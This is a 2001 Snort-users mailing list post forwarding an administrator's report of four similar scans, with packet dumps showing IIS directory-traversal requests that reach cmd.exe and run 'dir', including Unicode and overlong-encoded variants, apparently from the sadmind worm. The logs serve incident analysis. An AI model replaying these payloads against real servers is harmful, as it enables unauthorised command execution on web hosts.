[Snort-users] RE: SadMind rule

Steve Halligan agent33 at ...187...
Wed May 9 15:01:56 EDT 2001


Here is the sadmind worm failing to get into my server

-----Original Message-----
From: Steve Halligan [mailto:agent33 at ...2000...]
Sent: Tuesday, May 08, 2001 9:24 AM
To: INCIDENTS at ...220...
Subject: 4 similar IIS attempts in a 48 hour period.


I got these 4 attempts from different sources in a rather small window of
time.  They all start out with a portscan of port 80, so I don't think it is
the same person (Why would they need to rescan each time?).  You will note
that the order of the variation of the attempts is similar.  Is this a new
worm?  A new tool?

-Steve

----------------BEGIN SCAN REPORTS----------------------
*****************************SCAN
#1*****************************************
----------------------------------------------------------------------------
--
#(1 - 2059) [2001-05-05 21:20:45] 305
IPv4: 207.51.58.7 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=44 ID=19427 flags=0 offset=0 TTL=243 chksum=810
TCP:  port=41385 -> dport: 80  flags=******S* seq=3959699664
      ack=0 off=6 res=0 win=8760 urp=0 chksum=30305
      Options:
       #1 - MSS len=4 data=05B40000
Payload: none
----------------------------------------------------------------------------
--
#(1 - 2081) [2001-05-06 12:06:16] 62
IPv4: 207.51.58.7 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=106 ID=59795 flags=0 offset=0 TTL=242 chksum=26174
TCP:  port=42384 -> dport: 80  flags=***AP*** seq=4087665554
      ack=2688221853 off=5 res=0 win=8760 urp=0 chksum=5135
Payload:  length = 62

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D   c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69   32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A         r HTTP/1.0....
----------------------------------------------------------------------------
--
#(1 - 2082) [2001-05-06 12:06:17] 62
IPv4: 207.51.58.7 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=106 ID=59801 flags=0 offset=0 TTL=242 chksum=26168
TCP:  port=42746 -> dport: 80  flags=***AP*** seq=4111537358
      ack=2688221866 off=5 res=0 win=8760 urp=0 chksum=54038
Payload:  length = 62

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D   c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69   32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A         r HTTP/1.0....
----------------------------------------------------------------------------
--
#(1 - 2083) [2001-05-06 12:06:18] 62
IPv4: 207.51.58.7 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=106 ID=59807 flags=0 offset=0 TTL=242 chksum=26162
TCP:  port=43046 -> dport: 80  flags=***AP*** seq=4129406045
      ack=2688221880 off=5 res=0 win=8760 urp=0 chksum=10502
Payload:  length = 62

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D   c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69   32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A         r HTTP/1.0....
----------------------------------------------------------------------------
--
#(1 - 2084) [2001-05-06 12:06:19] 62
IPv4: 207.51.58.7 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=106 ID=59813 flags=0 offset=0 TTL=242 chksum=26156
TCP:  port=44051 -> dport: 80  flags=***AP*** seq=4191243658
      ack=2688221889 off=5 res=0 win=8760 urp=0 chksum=32107
Payload:  length = 62

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D   c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69   32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A         r HTTP/1.0....
----------------------------------------------------------------------------
--
#(1 - 2085) [2001-05-06 12:06:20] 62
IPv4: 207.51.58.7 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=106 ID=59819 flags=0 offset=0 TTL=242 chksum=26150
TCP:  port=45036 -> dport: 80  flags=***AP*** seq=4254676574
      ack=2688221904 off=5 res=0 win=8760 urp=0 chksum=40111
Payload:  length = 62

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D   c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69   32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A         r HTTP/1.0....
----------------------------------------------------------------------------
--
#(1 - 2086) [2001-05-06 12:06:21] 62
IPv4: 207.51.58.7 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=106 ID=59825 flags=0 offset=0 TTL=242 chksum=26144
TCP:  port=45723 -> dport: 80  flags=***AP*** seq=3643186
      ack=2688221913 off=5 res=0 win=8760 urp=0 chksum=10686
Payload:  length = 62

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D   c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69   32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A         r HTTP/1.0....
----------------------------------------------------------------------------
--
#(1 - 2087) [2001-05-06 12:06:22] 62
IPv4: 207.51.58.7 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=106 ID=59831 flags=0 offset=0 TTL=242 chksum=26138
TCP:  port=46489 -> dport: 80  flags=***AP*** seq=54010263
      ack=2688221922 off=5 res=0 win=8760 urp=0 chksum=43352
Payload:  length = 62

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D   c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69   32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A         r HTTP/1.0....
----------------------------------------------------------------------------
--
#(1 - 2088) [2001-05-06 12:06:23] 62
IPv4: 207.51.58.7 -> xx.xxx.xx.xx
      hlen=5 TOS=0 dlen=106 ID=59837 flags=0 offset=0 TTL=242 chksum=26132
TCP:  port=47320 -> dport: 80  flags=***AP*** seq=104581118
      ack=2688221936 off=5 res=0 win=8760 urp=0 chksum=64664
Payload:  length = 62

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D   c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69   32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A         r HTTP/1.0....
----------------------------------------------------------------------------
--
#(1 - 2089) [2001-05-06 12:06:24] 62
IPv4: 207.51.58.7 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=106 ID=59843 flags=0 offset=0 TTL=242 chksum=26126
TCP:  port=48175 -> dport: 80  flags=***AP*** seq=160395667
      ack=2688221939 off=5 res=0 win=8760 urp=0 chksum=18734
Payload:  length = 62

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D   c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69   32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A         r HTTP/1.0....
----------------------------------------------------------------------------
--
#(1 - 2090) [2001-05-06 12:06:25] 62
IPv4: 207.51.58.7 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=109 ID=59849 flags=0 offset=0 TTL=242 chksum=26117
TCP:  port=49033 -> dport: 80  flags=***AP*** seq=213665368
      ack=2688221947 off=5 res=0 win=8760 urp=0 chksum=38432
Payload:  length = 63

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
010 : 65 30 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65   e0../winnt/syste
020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64   m32/cmd.exe?/c+d
030 : 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A      ir HTTP/1.0....
----------------------------------------------------------------------------
--
#(1 - 2091) [2001-05-06 12:06:26] 62
IPv4: 207.51.58.7 -> xx.xx.xxx.xx
      hlen=5 TOS=0 dlen=112 ID=59855 flags=0 offset=0 TTL=242 chksum=26108
TCP:  port=49954 -> dport: 80  flags=***AP*** seq=270239886
      ack=2688221961 off=5 res=0 win=8760 urp=0 chksum=37899
Payload:  length = 64

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E F0   GET /scripts/...
010 : 80 80 AF 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74   ...../winnt/syst
020 : 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B   em32/cmd.exe?/c+
030 : 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A   dir HTTP/1.0....
----------------------------------------------------------------------------
--
#(1 - 2092) [2001-05-06 12:06:27] 62
IPv4: 207.51.58.7 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=115 ID=59861 flags=0 offset=0 TTL=242 chksum=26099
TCP:  port=50870 -> dport: 80  flags=***AP*** seq=328007726
      ack=2688221972 off=5 res=0 win=8760 urp=0 chksum=16280
Payload:  length = 65

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E F8   GET /scripts/...
010 : 80 80 80 AF 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73   ....../winnt/sys
020 : 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63   tem32/cmd.exe?/c
030 : 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D   +dir HTTP/1.0...
040 : 0A                                                .
----------------------------------------------------------------------------
--
#(1 - 2093) [2001-05-06 12:06:28] 62
IPv4: 207.51.58.7 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=118 ID=59867 flags=0 offset=0 TTL=242 chksum=26090
TCP:  port=51840 -> dport: 80  flags=***AP*** seq=378946693
      ack=2688221985 off=5 res=0 win=8760 urp=0 chksum=15453
Payload:  length = 66

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E FC   GET /scripts/...
010 : 80 80 80 80 AF 2E 2E 2F 77 69 6E 6E 74 2F 73 79   ......./winnt/sy
020 : 73 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F   stem32/cmd.exe?/
030 : 63 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A   c+dir HTTP/1.0..
040 : 0D 0A                                             ..
----------------------------------------------------------------------------
--
#(1 - 2094) [2001-05-06 12:06:29] 56
IPv4: 207.51.58.7 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=135 ID=59873 flags=0 offset=0 TTL=242 chksum=26067
TCP:  port=52623 -> dport: 80  flags=***AP*** seq=427404423
      ack=2688221992 off=5 res=0 win=8760 urp=0 chksum=12179
Payload:  length = 77

000 : 47 45 54 20 2F 6D 73 61 64 63 2F 2E 2E 25 65 30   GET /msadc/..%e0
010 : 2E 2E 2F 2E 2E 66 2E 2E 2E 2E 2F 2E 2E 30 25 38   ../..f..../..0%8
020 : 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D 33   ../winnt/system3
030 : 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 72   2/cmd.exe?/c+dir
040 : 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A             HTTP/1.0....



****************************SCAN
#2*******************************************
----------------------------------------------------------------------------
--
#(1 - 2075) [2001-05-06 11:25:12] 317
IPv4: 207.78.143.235 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=44 ID=33343 flags=0 offset=0 TTL=239 chksum=31438
TCP:  port=56344 -> dport: 80  flags=******S* seq=823530689
      ack=0 off=6 res=0 win=8760 urp=0 chksum=50416
      Options:
       #1 - MSS len=4 data=05B40000
Payload: none
----------------------------------------------------------------------------
--
#(1 - 2121) [2001-05-06 18:08:07] 62
IPv4: 207.78.143.235 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=106 ID=24567 flags=0 offset=0 TTL=239 chksum=40155
TCP:  port=57118 -> dport: 80  flags=***AP*** seq=3412786496
      ack=2693431821 off=5 res=0 win=8760 urp=0 chksum=846
Payload:  length = 62

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D   c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69   32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A         r HTTP/1.0....
----------------------------------------------------------------------------
--
#(1 - 2122) [2001-05-06 18:08:07] 62
IPv4: 207.78.143.235 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=106 ID=24573 flags=0 offset=0 TTL=239 chksum=40149
TCP:  port=57170 -> dport: 80  flags=***AP*** seq=3415977274
      ack=2693431825 off=5 res=0 win=8760 urp=0 chksum=22034
Payload:  length = 62

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D   c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69   32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A         r HTTP/1.0....
----------------------------------------------------------------------------
--
#(1 - 2123) [2001-05-06 18:08:18] 62
IPv4: 207.78.143.235 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=106 ID=24582 flags=0 offset=0 TTL=239 chksum=40140
TCP:  port=57326 -> dport: 80  flags=***AP*** seq=3426276033
      ack=2693431836 off=5 res=0 win=8760 urp=0 chksum=12048
Payload:  length = 62

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D   c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69   32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A         r HTTP/1.0....
----------------------------------------------------------------------------
--
#(1 - 2124) [2001-05-06 18:08:18] 62
IPv4: 207.78.143.235 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=106 ID=24587 flags=0 offset=0 TTL=239 chksum=40135
TCP:  port=64799 -> dport: 80  flags=***AP*** seq=3904402609
      ack=2693431838 off=5 res=0 win=8760 urp=0 chksum=16549
Payload:  length = 62

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D   c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69   32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A         r HTTP/1.0....
----------------------------------------------------------------------------
--
#(1 - 2125) [2001-05-06 18:08:28] 62
IPv4: 207.78.143.235 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=106 ID=24596 flags=0 offset=0 TTL=239 chksum=40126
TCP:  port=65302 -> dport: 80  flags=***AP*** seq=3936366689
      ack=2693431853 off=5 res=0 win=8760 urp=0 chksum=37071
Payload:  length = 62

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D   c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69   32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A         r HTTP/1.0....
----------------------------------------------------------------------------
--
#(1 - 2126) [2001-05-06 18:08:29] 62
IPv4: 207.78.143.235 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=106 ID=24602 flags=0 offset=0 TTL=239 chksum=40120
TCP:  port=39706 -> dport: 80  flags=***AP*** seq=107054918
      ack=2693431871 off=5 res=0 win=8760 urp=0 chksum=30028
Payload:  length = 62

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D   c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69   32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A         r HTTP/1.0....
----------------------------------------------------------------------------
--
#(1 - 2127) [2001-05-06 18:08:29] 62
IPv4: 207.78.143.235 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=106 ID=24608 flags=0 offset=0 TTL=239 chksum=40114
TCP:  port=39709 -> dport: 80  flags=***AP*** seq=107263367
      ack=2693431881 off=5 res=0 win=8760 urp=0 chksum=22274
Payload:  length = 62

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D   c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69   32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A         r HTTP/1.0....
----------------------------------------------------------------------------
--
#(1 - 2128) [2001-05-06 18:08:29] 62
IPv4: 207.78.143.235 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=106 ID=24614 flags=0 offset=0 TTL=239 chksum=40108
TCP:  port=39965 -> dport: 80  flags=***AP*** seq=124410128
      ack=2693431890 off=5 res=0 win=8760 urp=0 chksum=45410
Payload:  length = 62

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D   c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69   32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A         r HTTP/1.0....
----------------------------------------------------------------------------
--
#(1 - 2129) [2001-05-06 18:08:30] 62
IPv4: 207.78.143.235 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=106 ID=24620 flags=0 offset=0 TTL=239 chksum=40102
TCP:  port=40329 -> dport: 80  flags=***AP*** seq=148806580
      ack=2693431906 off=5 res=0 win=8760 urp=0 chksum=26790
Payload:  length = 62

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D   c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69   32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A         r HTTP/1.0....
----------------------------------------------------------------------------
--
#(1 - 2130) [2001-05-06 18:08:34] 62
IPv4: 207.78.143.235 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=109 ID=24629 flags=0 offset=0 TTL=239 chksum=40090
TCP:  port=40585 -> dport: 80  flags=***AP*** seq=164770468
      ack=2693431910 off=5 res=0 win=8760 urp=0 chksum=63492
Payload:  length = 63

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
010 : 65 30 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65   e0../winnt/syste
020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64   m32/cmd.exe?/c+d
030 : 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A      ir HTTP/1.0....
----------------------------------------------------------------------------
--
#(1 - 2131) [2001-05-06 18:08:34] 62
IPv4: 207.78.143.235 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=112 ID=24635 flags=0 offset=0 TTL=239 chksum=40081
TCP:  port=43268 -> dport: 80  flags=***AP*** seq=341732227
      ack=2693431920 off=5 res=0 win=8760 urp=0 chksum=61755
Payload:  length = 64

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E F0   GET /scripts/...
010 : 80 80 AF 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74   ...../winnt/syst
020 : 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B   em32/cmd.exe?/c+
030 : 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A   dir HTTP/1.0....
----------------------------------------------------------------------------
--
#(1 - 2132) [2001-05-06 18:08:38] 62
IPv4: 207.78.143.235 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=115 ID=24642 flags=0 offset=0 TTL=239 chksum=40071
TCP:  port=43341 -> dport: 80  flags=***AP*** seq=346538415
      ack=2693431963 off=5 res=0 win=8760 urp=0 chksum=50319
Payload:  length = 65

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E F8   GET /scripts/...
010 : 80 80 80 AF 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73   ....../winnt/sys
020 : 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63   tem32/cmd.exe?/c
030 : 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D   +dir HTTP/1.0...
040 : 0A                                                .
----------------------------------------------------------------------------
--
#(1 - 2133) [2001-05-06 18:08:38] 62
IPv4: 207.78.143.235 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=118 ID=24648 flags=0 offset=0 TTL=239 chksum=40062
TCP:  port=46205 -> dport: 80  flags=***AP*** seq=530846163
      ack=2693431970 off=5 res=0 win=8760 urp=0 chksum=42548
Payload:  length = 66

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E FC   GET /scripts/...
010 : 80 80 80 80 AF 2E 2E 2F 77 69 6E 6E 74 2F 73 79   ......./winnt/sy
020 : 73 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F   stem32/cmd.exe?/
030 : 63 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A   c+dir HTTP/1.0..
040 : 0D 0A                                             ..
----------------------------------------------------------------------------
--
#(1 - 2134) [2001-05-06 18:08:42] 56
IPv4: 207.78.143.235 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=135 ID=24656 flags=0 offset=0 TTL=239 chksum=40037
TCP:  port=46362 -> dport: 80  flags=***AP*** seq=541605131
      ack=2693431981 off=5 res=0 win=8760 urp=0 chksum=56033
Payload:  length = 77

000 : 47 45 54 20 2F 6D 73 61 64 63 2F 2E 2E 25 65 30   GET /msadc/..%e0
010 : 2E 2E 2F 2E 2E 66 2E 2E 2E 2E 2F 2E 2E 30 25 38   ../..f..../..0%8
020 : 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D 33   ../winnt/system3
030 : 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 72   2/cmd.exe?/c+dir
040 : 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A             HTTP/1.0....

***************************SCAN
#3**********************************************************

----------------------------------------------------------------------------
--
#(1 - 2147) [2001-05-07 02:22:21]  spp_portscan: PORTSCAN DETECTED from
210.107.187.10 (THRESHOLD 4 connections exceeded in 0 seconds)
IPv4: 210.107.187.10 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=44 ID=22549 flags=0 offset=0 TTL=238 chksum=30652
TCP:  port=50799 -> dport: 80  flags=******S* seq=2338995863
      ack=0 off=6 res=0 win=8760 urp=0 chksum=10291
      Options:
       #1 - MSS len=4 data=05B40000
Payload: none
----------------------------------------------------------------------------
--
#(1 - 2181) [2001-05-07 12:01:30]  WEB-IIS cmd.exe access
IPv4: 210.107.187.10 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=106 ID=34657 flags=0 offset=0 TTL=238 chksum=18485
TCP:  port=61125 -> dport: 80  flags=***AP*** seq=941135384
      ack=2710126730 off=5 res=0 win=8760 urp=0 chksum=106
Payload:  length = 62

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D   c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69   32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A         r HTTP/1.0....
----------------------------------------------------------------------------
--
#(1 - 2182) [2001-05-07 12:01:31]  WEB-IIS cmd.exe access
IPv4: 210.107.187.10 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=106 ID=34663 flags=0 offset=0 TTL=238 chksum=18479
TCP:  port=61278 -> dport: 80  flags=***AP*** seq=951451170
      ack=2710126742 off=5 res=0 win=8760 urp=0 chksum=39492
Payload:  length = 62

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D   c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69   32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A         r HTTP/1.0....


************************SCAN #4*******************************************
#(1 - 2150) [2001-05-07 03:07:07] 340
IPv4: 202.107.211.177 -> 209.46.94.80
      hlen=5 TOS=0 dlen=44 ID=45585 flags=0 offset=0 TTL=230 chksum=5406
TCP:  port=56725 -> dport: 80  flags=******S* seq=3486124858
      ack=0 off=6 res=0 win=8760 urp=0 chksum=61287
      Options:
       #1 - MSS len=4 data=05B40000
Payload: none
----------------------------------------------------------------------------
--
#(1 - 2173) [2001-05-07 10:15:58] 62
IPv4: 202.107.211.177 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=106 ID=18435 flags=0 offset=0 TTL=230 chksum=32492
TCP:  port=32840 -> dport: 80  flags=***AP*** seq=1452480610
      ack=2704182929 off=5 res=0 win=8760 urp=0 chksum=28623
Payload:  length = 62

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D   c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69   32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A         r HTTP/1.0....
----------------------------------------------------------------------------
--
#(1 - 2174) [2001-05-07 10:16:00] 62
IPv4: 202.107.211.177 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=106 ID=18441 flags=0 offset=0 TTL=230 chksum=32486
TCP:  port=33972 -> dport: 80  flags=***AP*** seq=1515064652
      ack=2704182931 off=5 res=0 win=8760 urp=0 chksum=30179
Payload:  length = 62

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D   c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69   32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A         r HTTP/1.0....




More information about the Snort-users mailing list